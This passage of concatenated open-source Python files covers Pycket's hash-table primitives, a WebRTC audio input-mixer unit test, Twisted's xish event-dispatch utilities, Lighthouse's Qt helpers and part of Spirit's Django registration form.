return table.hash_set(key, val, env, return_table_cont(table, env, cont))
@continuation
def return_table_cont(table, env, cont, _vals):
from pycket.interpreter import return_value
return return_value(table, env, cont)
@expose("hash-set", [W_HashTable, values.W_Object, values.W_Object], simple=False)
def hash_set(table, key, val, env, cont):
from pycket.interpreter import return_value
if not table.immutable():
raise SchemeException("hash-set: not given an immutable table")
# Fast path
if isinstance(table, W_ImmutableHashTable):
new_table = table.assoc(key, val)
return return_value(new_table, env, cont)
return hash_copy(table, env,
hash_set_cont(key, val, env, cont))
@continuation
def hash_ref_cont(default, k, env, cont, _vals):
from pycket.interpreter import return_value, check_one_val
val = check_one_val(_vals)
if val is not w_missing:
return return_value(val, env, cont)
if default is None:
raise SchemeException("key %s not found"%k.tostring())
if default.iscallable():
return default.call([], env, cont)
return return_value(default, env, cont)
@expose("hash-ref", [W_HashTable, values.W_Object, default(values.W_Object, None)], simple=False)
def hash_ref(ht, k, default, env, cont):
return ht.hash_ref(k, env, hash_ref_cont(default, k, env, cont))
@expose("hash-remove!", [W_HashTable, values.W_Object], simple=False)
def hash_remove_bang(ht, k, env, cont):
if ht.immutable():
raise SchemeException("hash-remove!: expected mutable hash table")
return ht.hash_remove_inplace(k, env, cont)
@expose("hash-remove", [W_HashTable, values.W_Object], simple=False)
def hash_remove(ht, k, env, cont):
if not ht.immutable():
raise SchemeException("hash-remove: expected immutable hash table")
return ht.hash_remove(k, env, cont)
@continuation
def hash_clear_cont(ht, env, cont, _vals):
return hash_clear_loop(ht, env, cont)
def hash_clear_loop(ht, env, cont):
from pycket.interpreter import return_value
if ht.length() == 0:
return return_value(values.w_void, env, cont)
w_k, w_v = ht.get_item(0)
return ht.hash_remove_inplace(w_k, env, hash_clear_cont(ht, env, cont))
@expose("hash-clear!", [W_HashTable], simple=False)
def hash_clear_bang(ht, env, cont):
from pycket.interpreter import return_value
if ht.is_impersonator():
ht.hash_clear_proc(env, cont)
return hash_clear_loop(ht, env, cont)
else:
ht.hash_empty()
return return_value(values.w_void, env, cont)
define_nyi("hash-clear", [W_HashTable])
@expose("hash-count", [W_HashTable])
def hash_count(hash):
return values.W_Fixnum(hash.length())
@continuation
def hash_keys_subset_huh_cont(keys_vals, hash_2, idx, env, cont, _vals):
from pycket.interpreter import return_value, check_one_val
val = check_one_val(_vals)
if val is values.w_false:
return return_value(values.w_false, env, cont)
else:
return hash_keys_subset_huh_loop(keys_vals, hash_2, idx + 1, env, cont)
@loop_label
def hash_keys_subset_huh_loop(keys_vals, hash_2, idx, env, cont):
from pycket.interpreter import return_value
if idx >= len(keys_vals):
return return_value(values.w_true, env, cont)
else:
return hash_ref([hash_2, keys_vals[idx][0], values.w_false], env,
hash_keys_subset_huh_cont(keys_vals, hash_2, idx, env, cont))
@jit.elidable
def uses_same_eq_comparison(hash_1, hash_2):
h_1 = hash_1
h_2 = hash_2
if hash_1.is_impersonator() or hash_1.is_chaperone():
h_1 = hash_1.get_proxied()
if hash_2.is_impersonator() or hash_2.is_chaperone():
h_2 = hash_2.get_proxied()
if isinstance(h_1, W_EqualHashTable):
return isinstance(h_2, W_EqualHashTable)
elif isinstance(h_1, W_EqMutableHashTable) or isinstance(h_1, W_EqImmutableHashTable):
return isinstance(h_2, W_EqMutableHashTable) or isinstance(h_2, W_EqImmutableHashTable)
elif isinstance(h_1, W_EqvMutableHashTable) or isinstance(h_1, W_EqvImmutableHashTable):
return isinstance(h_2, W_EqvMutableHashTable) or isinstance(h_2, W_EqvImmutableHashTable)
else:
return False
@expose("hash-keys-subset?", [W_HashTable, W_HashTable], simple=False)
def hash_keys_subset_huh(hash_1, hash_2, env, cont):
if not uses_same_eq_comparison(hash_1, hash_2):
raise SchemeException("hash-keys-subset?: given hash tables do not use the same key comparison -- first table : %s - second table: %s" % (hash_1.tostring(), hash_2.tostring()))
return hash_keys_subset_huh_loop(hash_1.hash_items(), hash_2, 0, env, cont)
@continuation
def hash_copy_ref_cont(keys, idx, src, new, env, cont, _vals):
from pycket.interpreter import check_one_val
val = check_one_val(_vals)
return new.hash_set(keys[idx][0], val, env,
hash_copy_set_cont(keys, idx, src, new, env, cont))
@continuation
def hash_copy_set_cont(keys, idx, src, new, env, cont, _vals):
return hash_copy_loop(keys, idx + 1, src, new, env, cont)
@loop_label
def hash_copy_loop(keys, idx, src, new, env, cont):
from pycket.interpreter import return_value
if idx >= len(keys):
return return_value(new, env, cont)
return src.hash_ref(keys[idx][0], env,
hash_copy_ref_cont(keys, idx, src, new, env, cont))
def hash_copy(src, env, cont):
from pycket.interpreter import return_value
if isinstance(src, W_ImmutableHashTable):
new = src.make_copy()
return return_value(new, env, cont)
new = src.make_empty()
if src.length() == 0:
return return_value(new, env, cont)
return hash_copy_loop(src.hash_items(), 0, src, new, env, cont)
expose("hash-copy", [W_HashTable], simple=False)(hash_copy)
# FIXME: not implemented
@expose("equal-hash-code", [values.W_Object])
def equal_hash_code(v):
# only for improper path cache entries
if isinstance(v, values.W_Cons):
if v.is_proper_list():
return values.W_Fixnum.ZERO
nm = v.car()
p = v.cdr()
if isinstance(nm, values_string.W_String) and \
isinstance(p, values.W_Path) and \
isinstance(p.path, str):
return values.W_Fixnum(objectmodel.compute_hash((nm.tostring(), p.path)))
return values.W_Fixnum.ZERO
@expose("equal-secondary-hash-code", [values.W_Object])
def equal_secondary_hash_code(v):
return values.W_Fixnum.ZERO
@expose("eq-hash-code", [values.W_Object])
def eq_hash_code(v):
t = type(v)
if t is values.W_Fixnum:
return v
if t is values.W_Flonum:
hash = objectmodel.compute_hash(v.value)
elif t is values.W_Character:
hash = objectmodel.compute_hash(v.value)
else:
hash = objectmodel.compute_hash(v)
return values.W_Fixnum(hash)
@expose("eqv-hash-code", [values.W_Object])
def eqv_hash_code(v):
hash = v.hash_eqv()
return values.W_Fixnum(hash)
| repo: iridium-browser/iridium-browser | path: /third_party/webrtc/modules/audio_processing/test/py_quality_assessment/quality_assessment/input_mixer_unittest.py | license: BSD-3-Clause / Apache-2.0 / MIT et al. (permissive) | Python | 5,929 bytes |
# Copyright (c) 2017 The WebRTC project authors. All Rights Reserved.
#
# Use of this source code is governed by a BSD-style license
# that can be found in the LICENSE file in the root of the source
# tree. An additional intellectual property rights grant can be found
# in the file PATENTS. All contributing project authors may
# be found in the AUTHORS file in the root of the source tree.
"""Unit tests for the input mixer module.
"""
import logging
import os
import shutil
import tempfile
import unittest
import mock
from . import exceptions
from . import input_mixer
from . import signal_processing
class TestApmInputMixer(unittest.TestCase):
"""Unit tests for the ApmInputMixer class.
"""
# Audio track file names created in setUp().
_FILENAMES = ['capture', 'echo_1', 'echo_2', 'shorter', 'longer']
# Target peak power level (dBFS) of each audio track file created in setUp().
# These values are hand-crafted in order to make saturation happen when
# capture and echo_2 are mixed and the contrary for capture and echo_1.
# None means that the power is not changed.
_MAX_PEAK_POWER_LEVELS = [-10.0, -5.0, 0.0, None, None]
# Audio track file durations in milliseconds.
_DURATIONS = [1000, 1000, 1000, 800, 1200]
_SAMPLE_RATE = 48000
def setUp(self):
"""Creates temporary data."""
self._tmp_path = tempfile.mkdtemp()
# Create audio track files.
self._audio_tracks = {}
for filename, peak_power, duration in zip(self._FILENAMES,
self._MAX_PEAK_POWER_LEVELS,
self._DURATIONS):
audio_track_filepath = os.path.join(self._tmp_path,
'{}.wav'.format(filename))
# Create a pure tone with the target peak power level.
template = signal_processing.SignalProcessingUtils.GenerateSilence(
duration=duration, sample_rate=self._SAMPLE_RATE)
signal = signal_processing.SignalProcessingUtils.GeneratePureTone(
template)
if peak_power is not None:
signal = signal.apply_gain(-signal.max_dBFS + peak_power)
signal_processing.SignalProcessingUtils.SaveWav(
audio_track_filepath, signal)
self._audio_tracks[filename] = {
'filepath':
audio_track_filepath,
'num_samples':
signal_processing.SignalProcessingUtils.CountSamples(signal)
}
def tearDown(self):
"""Recursively deletes temporary folders."""
shutil.rmtree(self._tmp_path)
def testCheckMixSameDuration(self):
"""Checks the duration when mixing capture and echo with same duration."""
mix_filepath = input_mixer.ApmInputMixer.Mix(
self._tmp_path, self._audio_tracks['capture']['filepath'],
self._audio_tracks['echo_1']['filepath'])
self.assertTrue(os.path.exists(mix_filepath))
mix = signal_processing.SignalProcessingUtils.LoadWav(mix_filepath)
self.assertEqual(
self._audio_tracks['capture']['num_samples'],
signal_processing.SignalProcessingUtils.CountSamples(mix))
def testRejectShorterEcho(self):
"""Rejects echo signals that are shorter than the capture signal."""
try:
_ = input_mixer.ApmInputMixer.Mix(
self._tmp_path, self._audio_tracks['capture']['filepath'],
self._audio_tracks['shorter']['filepath'])
self.fail('no exception raised')
except exceptions.InputMixerException:
pass
def testCheckMixDurationWithLongerEcho(self):
"""Checks the duration when mixing an echo longer than the capture."""
mix_filepath = input_mixer.ApmInputMixer.Mix(
self._tmp_path, self._audio_tracks['capture']['filepath'],
self._audio_tracks['longer']['filepath'])
self.assertTrue(os.path.exists(mix_filepath))
mix = signal_processing.SignalProcessingUtils.LoadWav(mix_filepath)
self.assertEqual(
self._audio_tracks['capture']['num_samples'],
signal_processing.SignalProcessingUtils.CountSamples(mix))
def testCheckOutputFileNamesConflict(self):
"""Checks that different echo files lead to different output file names."""
mix1_filepath = input_mixer.ApmInputMixer.Mix(
self._tmp_path, self._audio_tracks['capture']['filepath'],
self._audio_tracks['echo_1']['filepath'])
self.assertTrue(os.path.exists(mix1_filepath))
mix2_filepath = input_mixer.ApmInputMixer.Mix(
self._tmp_path, self._audio_tracks['capture']['filepath'],
self._audio_tracks['echo_2']['filepath'])
self.assertTrue(os.path.exists(mix2_filepath))
self.assertNotEqual(mix1_filepath, mix2_filepath)
def testHardClippingLogExpected(self):
"""Checks that hard clipping warning is raised when occurring."""
logging.warning = mock.MagicMock(name='warning')
_ = input_mixer.ApmInputMixer.Mix(
self._tmp_path, self._audio_tracks['capture']['filepath'],
self._audio_tracks['echo_2']['filepath'])
logging.warning.assert_called_once_with(
input_mixer.ApmInputMixer.HardClippingLogMessage())
def testHardClippingLogNotExpected(self):
"""Checks that hard clipping warning is not raised when not occurring."""
logging.warning = mock.MagicMock(name='warning')
_ = input_mixer.ApmInputMixer.Mix(
self._tmp_path, self._audio_tracks['capture']['filepath'],
self._audio_tracks['echo_1']['filepath'])
self.assertNotIn(
mock.call(input_mixer.ApmInputMixer.HardClippingLogMessage()),
logging.warning.call_args_list)
| repo: rmariano/Clean-code-in-Python | path: /book/src/ch01/src/test_annotations.py | license: MIT (permissive) | Python | 548 bytes |
"""Clean Code in Python - Chapter 01: Introduction, Tools, and Formatting
Tests for annotations examples
"""
import pytest
from src.annotations import Point, locate
@pytest.mark.parametrize(
"defined_object,expected",
(
(locate, {"latitude": float, "longitude": float, "return": Point}),
(Point, {"lat": float, "long": float}),
),
)
def test_annotations(defined_object, expected):
"""test the class/functions against its expected annotations"""
assert getattr(defined_object, "__annotations__") == expected
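# Illustrative sketch (not part of the test module): for a signature such as
#   def locate(latitude: float, longitude: float) -> Point: ...
# Python collects the annotations into a plain dict,
#   locate.__annotations__ == {"latitude": float, "longitude": float,
#                              "return": Point}
# which is exactly what the parametrized case above asserts.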
| repo: wistbean/learn_python3_spider | path: /stackoverflow/venv/lib/python3.6/site-packages/twisted/words/xish/utility.py | license: MIT (permissive) | Python | 13,482 bytes |
# -*- test-case-name: twisted.words.test.test_xishutil -*-
#
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Event Dispatching and Callback utilities.
"""
from __future__ import absolute_import, division
from twisted.python import log
from twisted.python.compat import iteritems
from twisted.words.xish import xpath
class _MethodWrapper(object):
"""
Internal class for tracking method calls.
"""
def __init__(self, method, *args, **kwargs):
self.method = method
self.args = args
self.kwargs = kwargs
def __call__(self, *args, **kwargs):
nargs = self.args + args
nkwargs = self.kwargs.copy()
nkwargs.update(kwargs)
self.method(*nargs, **nkwargs)
class CallbackList:
"""
Container for callbacks.
Event queries are linked to lists of callables. When a matching event
occurs, these callables are called in sequence. One-time callbacks
are removed from the list after the first time the event was triggered.
    Arguments to callbacks are spread across two sets. The first set,
callback specific, is passed to C{addCallback} and is used for all
subsequent event triggers. The second set is passed to C{callback} and is
event specific. Positional arguments in the second set come after the
positional arguments of the first set. Keyword arguments in the second set
override those in the first set.
@ivar callbacks: The registered callbacks as mapping from the callable to a
tuple of a wrapper for that callable that keeps the
callback specific arguments and a boolean that signifies
if it is to be called only once.
@type callbacks: C{dict}
"""
def __init__(self):
self.callbacks = {}
def addCallback(self, onetime, method, *args, **kwargs):
"""
Add callback.
The arguments passed are used as callback specific arguments.
@param onetime: If C{True}, this callback is called at most once.
@type onetime: C{bool}
@param method: The callback callable to be added.
@param args: Positional arguments to the callable.
@type args: C{list}
@param kwargs: Keyword arguments to the callable.
@type kwargs: C{dict}
"""
        if method not in self.callbacks:
self.callbacks[method] = (_MethodWrapper(method, *args, **kwargs),
onetime)
def removeCallback(self, method):
"""
Remove callback.
@param method: The callable to be removed.
"""
if method in self.callbacks:
del self.callbacks[method]
def callback(self, *args, **kwargs):
"""
Call all registered callbacks.
The passed arguments are event specific and augment and override
the callback specific arguments as described above.
@note: Exceptions raised by callbacks are trapped and logged. They will
not propagate up to make sure other callbacks will still be
called, and the event dispatching always succeeds.
@param args: Positional arguments to the callable.
@type args: C{list}
@param kwargs: Keyword arguments to the callable.
@type kwargs: C{dict}
"""
for key, (methodwrapper, onetime) in list(self.callbacks.items()):
try:
methodwrapper(*args, **kwargs)
except:
log.err()
if onetime:
del self.callbacks[key]
def isEmpty(self):
"""
Return if list of registered callbacks is empty.
@rtype: C{bool}
"""
return len(self.callbacks) == 0
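# Argument-merging sketch (illustrative, not part of the module): given
#   cbl = CallbackList()
#   cbl.addCallback(False, f, 1, x=2)   # callback-specific arguments
#   cbl.callback(3, x=4)                # event-specific arguments
# _MethodWrapper invokes f(1, 3, x=4): positionals are concatenated with the
# callback-specific ones first, and event-specific keywords override.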
class EventDispatcher:
"""
Event dispatching service.
The C{EventDispatcher} allows observers to be registered for certain events
that are dispatched. There are two types of events: XPath events and Named
events.
Every dispatch is triggered by calling L{dispatch} with a data object and,
for named events, the name of the event.
When an XPath type event is dispatched, the associated object is assumed to
be an L{Element<twisted.words.xish.domish.Element>} instance, which is
matched against all registered XPath queries. For every match, the
respective observer will be called with the data object.
A named event will simply call each registered observer for that particular
event name, with the data object. Unlike XPath type events, the data object
is not restricted to L{Element<twisted.words.xish.domish.Element>}, but can
be anything.
When registering observers, the event that is to be observed is specified
using an L{xpath.XPathQuery} instance or a string. In the latter case, the
string can also contain the string representation of an XPath expression.
To distinguish these from named events, each named event should start with
a special prefix that is stored in C{self.prefix}. It defaults to
C{//event/}.
Observers registered using L{addObserver} are persistent: after the
observer has been triggered by a dispatch, it remains registered for a
possible next dispatch. If instead L{addOnetimeObserver} was used to
observe an event, the observer is removed from the list of observers after
the first observed event.
Observers can also be prioritized, by providing an optional C{priority}
parameter to the L{addObserver} and L{addOnetimeObserver} methods. Higher
priority observers are then called before lower priority observers.
Finally, observers can be unregistered by using L{removeObserver}.
"""
def __init__(self, eventprefix="//event/"):
self.prefix = eventprefix
self._eventObservers = {}
self._xpathObservers = {}
self._dispatchDepth = 0 # Flag indicating levels of dispatching
# in progress
self._updateQueue = [] # Queued updates for observer ops
def _getEventAndObservers(self, event):
if isinstance(event, xpath.XPathQuery):
# Treat as xpath
observers = self._xpathObservers
else:
if self.prefix == event[:len(self.prefix)]:
# Treat as event
observers = self._eventObservers
else:
# Treat as xpath
event = xpath.internQuery(event)
observers = self._xpathObservers
return event, observers
def addOnetimeObserver(self, event, observerfn, priority=0, *args, **kwargs):
"""
Register a one-time observer for an event.
Like L{addObserver}, but is only triggered at most once. See there
for a description of the parameters.
"""
self._addObserver(True, event, observerfn, priority, *args, **kwargs)
def addObserver(self, event, observerfn, priority=0, *args, **kwargs):
"""
Register an observer for an event.
Each observer will be registered with a certain priority. Higher
priority observers get called before lower priority observers.
@param event: Name or XPath query for the event to be monitored.
@type event: C{str} or L{xpath.XPathQuery}.
@param observerfn: Function to be called when the specified event
has been triggered. This callable takes
one parameter: the data object that triggered
the event. When specified, the C{*args} and
C{**kwargs} parameters to addObserver are being used
as additional parameters to the registered observer
callable.
@param priority: (Optional) priority of this observer in relation to
other observer that match the same event. Defaults to
C{0}.
@type priority: C{int}
"""
self._addObserver(False, event, observerfn, priority, *args, **kwargs)
def _addObserver(self, onetime, event, observerfn, priority, *args, **kwargs):
# If this is happening in the middle of the dispatch, queue
# it up for processing after the dispatch completes
if self._dispatchDepth > 0:
self._updateQueue.append(lambda:self._addObserver(onetime, event, observerfn, priority, *args, **kwargs))
return
event, observers = self._getEventAndObservers(event)
if priority not in observers:
cbl = CallbackList()
observers[priority] = {event: cbl}
else:
priorityObservers = observers[priority]
if event not in priorityObservers:
cbl = CallbackList()
observers[priority][event] = cbl
else:
cbl = priorityObservers[event]
cbl.addCallback(onetime, observerfn, *args, **kwargs)
def removeObserver(self, event, observerfn):
"""
Remove callable as observer for an event.
The observer callable is removed for all priority levels for the
specified event.
@param event: Event for which the observer callable was registered.
@type event: C{str} or L{xpath.XPathQuery}
@param observerfn: Observer callable to be unregistered.
"""
# If this is happening in the middle of the dispatch, queue
# it up for processing after the dispatch completes
if self._dispatchDepth > 0:
self._updateQueue.append(lambda:self.removeObserver(event, observerfn))
return
event, observers = self._getEventAndObservers(event)
emptyLists = []
for priority, priorityObservers in iteritems(observers):
for query, callbacklist in iteritems(priorityObservers):
if event == query:
callbacklist.removeCallback(observerfn)
if callbacklist.isEmpty():
emptyLists.append((priority, query))
for priority, query in emptyLists:
del observers[priority][query]
def dispatch(self, obj, event=None):
"""
Dispatch an event.
When C{event} is L{None}, an XPath type event is triggered, and
C{obj} is assumed to be an instance of
L{Element<twisted.words.xish.domish.Element>}. Otherwise, C{event}
holds the name of the named event being triggered. In the latter case,
C{obj} can be anything.
@param obj: The object to be dispatched.
@param event: Optional event name.
@type event: C{str}
"""
foundTarget = False
self._dispatchDepth += 1
        if event is not None:
# Named event
observers = self._eventObservers
match = lambda query, obj: query == event
else:
# XPath event
observers = self._xpathObservers
match = lambda query, obj: query.matches(obj)
priorities = list(observers.keys())
priorities.sort()
priorities.reverse()
emptyLists = []
for priority in priorities:
for query, callbacklist in iteritems(observers[priority]):
if match(query, obj):
callbacklist.callback(obj)
foundTarget = True
if callbacklist.isEmpty():
emptyLists.append((priority, query))
for priority, query in emptyLists:
del observers[priority][query]
self._dispatchDepth -= 1
# If this is a dispatch within a dispatch, don't
# do anything with the updateQueue -- it needs to
# wait until we've back all the way out of the stack
if self._dispatchDepth == 0:
# Deal with pending update operations
for f in self._updateQueue:
f()
self._updateQueue = []
return foundTarget
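# Usage sketch (illustrative; observer names are hypothetical): named events
# carry the "//event/" prefix, anything else is parsed as an XPath query.
#   d = EventDispatcher()
#   d.addObserver("//event/connected", onConnected)  # named event
#   d.addObserver("/message", onMessage)             # XPath query
#   d.dispatch(obj, "//event/connected")             # -> onConnected(obj)
#   d.dispatch(element)                              # XPath match -> onMessage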
class XmlPipe(object):
"""
XML stream pipe.
Connects two objects that communicate stanzas through an XML stream like
interface. Each of the ends of the pipe (sink and source) can be used to
send XML stanzas to the other side, or add observers to process XML stanzas
that were sent from the other side.
XML pipes are usually used in place of regular XML streams that are
transported over TCP. This is the reason for the use of the names source
and sink for both ends of the pipe. The source side corresponds with the
entity that initiated the TCP connection, whereas the sink corresponds with
the entity that accepts that connection. In this object, though, the source
and sink are treated equally.
Unlike Jabber
L{XmlStream<twisted.words.protocols.jabber.xmlstream.XmlStream>}s, the sink
    and source objects are assumed to represent an eternally connected and
initialized XML stream. As such, events corresponding to connection,
disconnection, initialization and stream errors are not dispatched or
processed.
@since: 8.2
@ivar source: Source XML stream.
@ivar sink: Sink XML stream.
"""
def __init__(self):
self.source = EventDispatcher()
self.sink = EventDispatcher()
self.source.send = lambda obj: self.sink.dispatch(obj)
self.sink.send = lambda obj: self.source.dispatch(obj)
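# Pipe sketch (illustrative; observer name is hypothetical): stanzas sent into
# one end are dispatched on the other, so two in-process entities can exchange
# XML without a TCP transport.
#   pipe = XmlPipe()
#   pipe.sink.addObserver("/presence", onPresence)
#   pipe.source.send(presence_element)   # -> onPresence(presence_element)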
| repo: gaasedelen/lighthouse | path: /plugins/lighthouse/util/qt/util.py | license: MIT (permissive) | Python | 11,119 bytes |
import sys
import time
import logging
import threading
from .shim import *
from ..misc import is_mainthread
from ..python import *
from ..disassembler import disassembler
logger = logging.getLogger("Lighthouse.Qt.Util")
#------------------------------------------------------------------------------
# Qt Fonts
#------------------------------------------------------------------------------
def MonospaceFont():
"""
Convenience alias for creating a monospace Qt font object.
"""
font = QtGui.QFont("Courier New")
font.setStyleHint(QtGui.QFont.Monospace)
return font
#------------------------------------------------------------------------------
# Qt Util
#------------------------------------------------------------------------------
def color_text(text, color):
"""
Return a colorized (HTML) version of the given string.
"""
return "<font color=\"%s\">%s</font>" % (color.name(), text)
def copy_to_clipboard(data):
"""
Copy the given data (a string) to the system clipboard.
"""
cb = QtWidgets.QApplication.clipboard()
cb.clear(mode=cb.Clipboard)
cb.setText(data, mode=cb.Clipboard)
def flush_qt_events():
"""
Flush the Qt event pipeline.
"""
app = QtCore.QCoreApplication.instance()
app.processEvents()
def get_qt_icon(name):
"""
Get a standard Qt icon by name.
"""
icon_type = getattr(QtWidgets.QStyle, name)
return QtWidgets.QApplication.style().standardIcon(icon_type)
def get_default_font_size():
"""
Get the default font size for this QApplication.
"""
return QtGui.QFont().pointSizeF()
def get_dpi_scale():
"""
Get a DPI-afflicted value useful for consistent UI scaling.
"""
font = MonospaceFont()
font.setPointSize(normalize_to_dpi(120))
fm = QtGui.QFontMetricsF(font)
# xHeight is expected to be 40.0 at normal DPI
return int(fm.height() / 173.0)
def compute_color_on_gradient(percent, color1, color2):
"""
Compute the color specified by a percent between two colors.
"""
r1, g1, b1, _ = color1.getRgb()
r2, g2, b2, _ = color2.getRgb()
# compute the new color across the gradient of color1 -> color 2
r = r1 + int(percent * (r2 - r1))
g = g1 + int(percent * (g2 - g1))
b = b1 + int(percent * (b2 - b1))
# return the new color
return QtGui.QColor(r,g,b)
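# For example (sketch): the midpoint between pure red and pure blue,
#   compute_color_on_gradient(0.5, QtGui.QColor(255, 0, 0), QtGui.QColor(0, 0, 255))
# evaluates to QColor(128, 0, 127) -- each channel moves halfway (truncated)
# along the color1 -> color2 gradient.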
def move_mouse_event(mouse_event, position):
"""
Move the given mouse event to a different position.
"""
new_event = QtGui.QMouseEvent(
mouse_event.type(),
position,
mouse_event.button(),
mouse_event.buttons(),
mouse_event.modifiers()
)
return new_event
def normalize_to_dpi(font_size):
"""
Normalize the given font size based on the system DPI.
"""
if sys.platform == "darwin": # macos is lame
return font_size + 2
return font_size
def prompt_string(label, title, default=""):
"""
Prompt the user with a dialog to enter a string.
This does not block the IDA main thread (unlike idaapi.askstr)
"""
dpi_scale = get_dpi_scale()
dlg = QtWidgets.QInputDialog(None)
dlg.setWindowFlags(dlg.windowFlags() & ~QtCore.Qt.WindowContextHelpButtonHint)
dlg.setInputMode(QtWidgets.QInputDialog.TextInput)
dlg.setLabelText(label)
dlg.setWindowTitle(title)
dlg.setTextValue(default)
dlg.resize(
dpi_scale*400,
dpi_scale*50
)
dlg.setModal(True)
dlg.show()
dlg.setFocus(QtCore.Qt.PopupFocusReason)
ok = dlg.exec_()
text = str(dlg.textValue())
return (ok, text)
def predict_bg_color(image):
"""
Predict the 'background color' of a given image.
This function takes an image, and analyzes its first row of pixels. It
will return the color that it believes to be the 'background color' based
on the longest sequence of identical pixels.
"""
assert image.width() and image.height()
# the details for the longest known color streak will be saved in these
longest = 1
speculative_bg = image.pixel(0, 0)
# this will be the computed length of the current color streak
sequence = 1
# find the longest streak of color in a single pixel slice
for x in xrange(1, image.width()):
# the color of this pixel matches the last pixel, extend the streak count
if image.pixel(x, 0) == image.pixel(x-1,0):
sequence += 1
#
# this catches the case where the longest color streak is in fact
# the last one. this ensures the streak color will get saved.
#
if x != image.width():
continue
# color change, determine if this was the longest continuous color streak
if sequence > longest:
# save the last pixel as the longest sequence / most likely BG color
longest = sequence
speculative_bg = image.pixel(x-1, 0)
# reset the sequence counter
sequence = 1
# return the color we speculate to be the background color
return speculative_bg
def remap_key_event(event, new_key):
"""
Change a given KeyPress QEvent to a different key.
"""
return QtGui.QKeyEvent(
QtCore.QEvent.KeyPress,
new_key,
event.modifiers(),
event.text(),
event.isAutoRepeat(),
event.count()
)
def singleshot(ms, function=None):
"""
A Qt Singleshot timer that can be stopped.
"""
timer = QtCore.QTimer()
timer.setInterval(ms)
timer.setSingleShot(True)
timer.timeout.connect(function)
return timer
#------------------------------------------------------------------------------
# Async Util
#------------------------------------------------------------------------------
def await_future(future):
"""
Wait for a queue (future) message without blocking the main (Qt) thread.
This is effectively a technique I use to get around completely blocking
IDA's mainthread while waiting for a threaded result that may need to make
use of the execute_sync operators.
Waiting for a 'future' thread result to come through via this function
lets other execute_sync actions to slip through (at least Read, Fast).
"""
interval = 0.02 # the interval which we wait for a response
# run until the message arrives through the future (a queue)
while True:
# block for a brief period to see if the future completes
try:
return future.get(timeout=interval)
#
# the future timed out, so perhaps it is blocked on a request
# to the mainthread. flush the requests now and try again
#
except queue.Empty as e:
pass
logger.debug("Awaiting future...")
#
# if we are executing (well, blocking) as the main thread, we need
# to flush the event loop so IDA does not hang
#
if QT_AVAILABLE and is_mainthread():
flush_qt_events()
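# Producer-side sketch (illustrative; do_work is hypothetical): await_future()
# pairs with a worker thread that pushes its result into a queue, e.g.
#   future = queue.Queue()
#   threading.Thread(target=lambda: future.put(do_work())).start()
#   result = await_future(future)   # the Qt mainthread keeps pumping events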
def await_lock(lock):
"""
Wait for a lock without blocking the main (Qt) thread.
See await_future() for more details.
"""
elapsed = 0 # total time elapsed waiting for the lock
interval = 0.02 # the interval (in seconds) between acquire attempts
timeout = 60.0 # the total time allotted to acquiring the lock
end_time = time.time() + timeout
# wait until the lock is available
while time.time() < end_time:
#
# attempt to acquire the given lock without blocking (via 'False').
# if we successfully acquire the lock, then we can return (success)
#
if lock.acquire(False):
logger.debug("Acquired lock!")
return
#
# the lock is not available yet. we need to sleep so we don't choke
# the cpu, and try to acquire the lock again next time through...
#
logger.debug("Awaiting lock...")
time.sleep(interval)
#
# if we are executing (well, blocking) as the main thread, we need
# to flush the event loop so IDA does not hang
#
if QT_AVAILABLE and is_mainthread():
flush_qt_events()
#
# we spent 60 seconds trying to acquire the lock, but never got it...
# to avoid hanging IDA indefinitely (or worse), we abort via signal
#
raise RuntimeError("Failed to acquire lock after %f seconds!" % timeout)
class QMainthread(QtCore.QObject):
"""
A Qt object whose sole purpose is to execute code on the mainthread.
"""
toMainthread = QtCore.pyqtSignal(object)
toMainthreadFast = QtCore.pyqtSignal(object)
def __init__(self):
super(QMainthread, self).__init__()
# helpers used to ensure thread safety
self._lock = threading.Lock()
self._fast_refs = []
self._result_queue = queue.Queue()
# signals used to communicate with the Qt mainthread
self.toMainthread.connect(self._execute_with_result)
self.toMainthreadFast.connect(self._execute_fast)
#--------------------------------------------------------------------------
# Public
#--------------------------------------------------------------------------
def execute(self, function):
"""
Execute a function on the mainthread and wait for its return value.
This function is safe to call from any thread, at any time.
"""
# if we are already on the mainthread, execute the callable inline
if is_mainthread():
return function()
# execute the callable on the mainthread and wait for it to complete
with self._lock:
self.toMainthread.emit(function)
result = self._result_queue.get()
# return the result of executing on the mainthread
return result
def execute_fast(self, function):
"""
Execute a function on the mainthread without waiting for completion.
"""
#
# append the given function to a reference list.
#
# I do this because I am not confident python / qt will guarantee the
# lifetime of the callable (function) as we cross threads and the
# callee scope/callstack dissolves away from beneath us
#
        # this callable will be deleted from the ref list in _execute_fast()
#
self._fast_refs.append(function)
# signal to the mainthread that a new function is ready to execute
self.toMainthreadFast.emit(function)
#--------------------------------------------------------------------------
# Internal
#--------------------------------------------------------------------------
def _execute_with_result(self, function):
try:
self._result_queue.put(function())
except Exception as e:
logger.exception("QMainthread Exception")
self._result_queue.put(None)
def _execute_fast(self, function):
function()
self._fast_refs.remove(function)
qt_mainthread = QMainthread()
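# Usage sketch (illustrative; some_widget is hypothetical): from a background
# thread,
#   title = qt_mainthread.execute(lambda: some_widget.windowTitle())
# blocks until the lambda has run on the Qt mainthread and returns its result,
# while qt_mainthread.execute_fast(fn) queues fn without waiting.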
| repo: nitely/Spirit | path: /spirit/user/auth/forms.py | license: MIT (permissive) | Python | 5,181 bytes |
# -*- coding: utf-8 -*-
from django import forms
from django.contrib.auth import get_user_model
from django.contrib.auth.forms import AuthenticationForm, PasswordResetForm
from django.utils.translation import gettext_lazy as _
from django.template.loader import render_to_string
from spirit.core.conf import settings
from spirit.core import tasks
from spirit.user.forms import CleanEmailMixin
User = get_user_model()
class RegistrationForm(CleanEmailMixin, forms.ModelForm):
email2 = forms.CharField(
label=_("Email confirmation"),
widget=forms.EmailInput,
max_length=254,
help_text=_("Enter the same email as above, for verification."))
# todo: add password validator for Django 1.9
password = forms.CharField(
label=_("Password"),
widget=forms.PasswordInput)
honeypot = forms.CharField(
label=_("Leave blank"),
required=False)
class Meta:
model = User
fields = ("username", "email")
def __init__(self, *args, **kwargs):
super(RegistrationForm, self).__init__(*args, **kwargs)
        self.fields['email'].required = True  # the Django model does not require it
def clean_honeypot(self):
"""Check that nothing has been entered into the honeypot."""
value = self.cleaned_data["honeypot"]
if value:
raise forms.ValidationError(
_("Do not fill this field."))
return value
def clean_username(self):
username = self.cleaned_data["username"]
if settings.ST_CASE_INSENSITIVE_USERNAMES:
username = username.lower()
is_taken = (
User.objects
.filter(username=username)
.exists())
if is_taken:
raise forms.ValidationError(
_("The username is taken."))
return self.cleaned_data["username"]
def clean_email2(self):
